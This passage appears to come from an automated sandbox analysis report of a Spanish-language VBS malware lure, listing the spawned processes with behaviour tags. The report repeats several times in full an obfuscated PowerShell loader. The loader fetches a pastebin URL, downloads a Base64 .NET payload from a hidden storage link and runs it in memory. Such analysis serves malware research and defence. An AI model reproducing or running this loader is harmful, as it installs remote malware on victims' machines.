☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5280

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:5580

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:748

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:2240

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs
1⤵
- Opens file in notepad (likely ransom note)
PID:5492

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:4732

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
PID:3280

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:5716

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:2024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $LoPuennnTes = 'J☆Bq☆GI☆dQB0☆HE☆I☆☆9☆C☆☆Jw☆w☆Cc☆Ow☆k☆G8☆e☆Bq☆GI☆bw☆g☆D0☆I☆☆n☆CU☆c☆B6☆EE☆YwBP☆Gc☆SQBu☆E0☆cg☆l☆Cc☆OwBb☆FM☆eQBz☆HQ☆ZQBt☆C4☆TgBl☆HQ☆LgBT☆GU☆cgB2☆Gk☆YwBl☆F☆☆bwBp☆G4☆d☆BN☆GE☆bgBh☆Gc☆ZQBy☆F0☆Og☆6☆FM☆ZQBj☆HU☆cgBp☆HQ☆eQBQ☆HI☆bwB0☆G8☆YwBv☆Gw☆I☆☆9☆C☆☆WwBT☆Hk☆cwB0☆GU☆bQ☆u☆E4☆ZQB0☆C4☆UwBl☆GM☆dQBy☆Gk☆d☆B5☆F☆☆cgBv☆HQ☆bwBj☆G8☆b☆BU☆Hk☆c☆Bl☆F0☆Og☆6☆FQ☆b☆Bz☆DE☆Mg☆7☆CQ☆U☆B4☆EU☆T☆BY☆C☆☆PQ☆g☆Cc☆a☆B0☆HQ☆c☆Bz☆Do☆Lw☆v☆H☆☆YQBz☆HQ☆ZQBi☆Gk☆bg☆u☆GM☆bwBt☆C8☆cgBh☆Hc☆LwBB☆GQ☆dg☆5☆Gc☆QgBI☆GE☆Jw☆7☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆PQ☆g☆Cg☆TgBl☆Hc☆LQBP☆GI☆agBl☆GM☆d☆☆g☆E4☆ZQB0☆C4☆VwBl☆GI☆QwBs☆Gk☆ZQBu☆HQ☆KQ☆u☆EQ☆bwB3☆G4☆b☆Bv☆GE☆Z☆BT☆HQ☆cgBp☆G4☆Zw☆o☆C☆☆J☆BQ☆Hg☆RQBM☆Fg☆I☆☆g☆Ck☆Ow☆k☆FI☆QwBr☆FY☆Sg☆g☆D0☆I☆☆o☆E4☆ZQB3☆C0☆TwBi☆Go☆ZQBj☆HQ☆I☆BO☆GU☆d☆☆u☆Fc☆ZQBi☆EM☆b☆Bp☆GU☆bgB0☆Ck☆LgBE☆G8☆dwBu☆Gw☆bwBh☆GQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆SQBI☆H☆☆T☆Bx☆C☆☆KQ☆u☆HI☆ZQBw☆Gw☆YQBj☆GU☆K☆☆n☆CQ☆JQ☆n☆Cw☆JwBB☆Cc☆KQ☆7☆Fs☆QgB5☆HQ☆ZQBb☆F0☆XQ☆g☆CQ☆Z☆Bv☆HU☆bQBj☆C☆☆PQ☆g☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBD☆G8☆bgB2☆GU☆cgB0☆F0☆Og☆6☆EY☆cgBv☆G0☆QgBh☆HM☆ZQ☆2☆DQ☆UwB0☆HI☆aQBu☆Gc☆K☆☆g☆CQ☆UgBD☆Gs☆VgBK☆C☆☆KQ☆7☆Fs☆cwB5☆HM☆d☆Bl☆G0☆LgBB☆H☆☆c☆BE☆G8☆bQBh☆Gk☆bgBd☆Do☆OgBD☆HU☆cgBy☆GU☆bgB0☆EQ☆bwBt☆GE☆aQBu☆C4☆T☆Bv☆GE☆Z☆☆o☆CQ☆Z☆Bv☆HU☆bQBj☆Ck☆LgBH☆GU☆d☆BU☆Hk☆c☆Bl☆Cg☆JwBU☆GU☆a☆B1☆Gw☆YwBo☆GU☆cwBY☆Hg☆W☆B4☆Hg☆LgBD☆Gw☆YQBz☆HM☆MQ☆n☆Ck☆LgBH☆GU☆d☆BN☆GU☆d☆Bo☆G8☆Z☆☆o☆Cc☆TQBz☆HE☆QgBJ☆GI☆WQ☆n☆Ck☆LgBJ☆G4☆dgBv☆Gs☆ZQ☆o☆CQ☆bgB1☆Gw☆b☆☆s☆C☆☆WwBv☆GI☆agBl☆GM☆d☆Bb☆F0☆XQ☆g☆Cg☆Jw☆w☆GM☆M☆Bi☆GM☆YwBh☆DU☆YgBh☆GI☆ZQ☆t☆Dg☆NQ☆2☆GE☆LQ☆4☆DE☆Mg☆0☆C0☆Mw☆3☆DI☆Ng☆t☆DY☆Yw☆0☆Dc☆Ng☆3☆DE☆Ng☆9☆G4☆ZQBr☆G8☆d☆☆m☆GE☆aQBk☆GU☆bQ☆9☆HQ☆b☆Bh☆D8☆d☆B4☆HQ☆Lg☆0☆DI☆M☆☆y☆C0☆M☆☆x☆C0☆Ng☆x☆FQ☆QQBS☆EM☆R☆☆v☆G8☆LwBt☆G8☆Yw☆u☆HQ☆bwBw☆HM☆c☆Bw☆GE☆LgBv☆GM☆aQBu☆G8☆cgB0☆GM☆ZQBs☆GU☆LQBv☆HQ☆bgBl☆G0☆dQBj☆G8☆Z☆☆v☆GI☆Lw☆w☆HY☆LwBt☆G8☆Yw☆u☆HM☆aQBw☆GE☆ZQBs☆Gc☆bwBv☆Gc☆LgBl☆Gc☆YQBy☆G8☆d☆Bz☆GU☆cwBh☆GI☆ZQBy☆Gk☆Zg☆v☆C8☆OgBz☆H☆☆d☆B0☆Gg☆Jw☆g☆Cw☆I☆☆k☆G8☆e☆Bq☆GI☆bw☆g☆Cw☆I☆☆n☆GE☆bQBi☆Gc☆eQBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆F8☆XwBf☆C0☆LQ☆t☆C0☆LQ☆t☆C0☆Jw☆s☆C☆☆J☆Bq☆GI☆dQB0☆HE☆L☆☆g☆Cc☆MQ☆n☆Cw☆I☆☆n☆FI☆bwBk☆GE☆Jw☆g☆Ck☆KQ☆7☆☆==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $LoPuennnTes.replace('☆','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs');powershell $KByHL;
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$jbutq = '0';$oxjbo = 'C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs';[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$PxELX = 'https://pastebin.com/raw/Adv9gBHa';$IHpLq = (New-Object Net.WebClient).DownloadString( $PxELX );$RCkVJ = (New-Object Net.WebClient).DownloadString( $IHpLq ).replace('$%','A');[Byte[]] $doumc = [system.Convert]::FromBase64String( $RCkVJ );[system.AppDomain]::CurrentDomain.Load($doumc).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0c0bcca5babe-856a-8124-3726-6c476716=nekot&aidem=tla?txt.4202-01-61TARCD/o/moc.topsppa.ocinortcele-otnemucod/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $oxjbo , 'ambgy_________________________-------', $jbutq, '1', 'Roda' ));"
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
4⤵
- System Location Discovery: System Language Discovery
PID:5236

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTIFICACION_RADICADO1710202410140000.vbs"
1⤵
- Checks computer location settings
PID:5272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
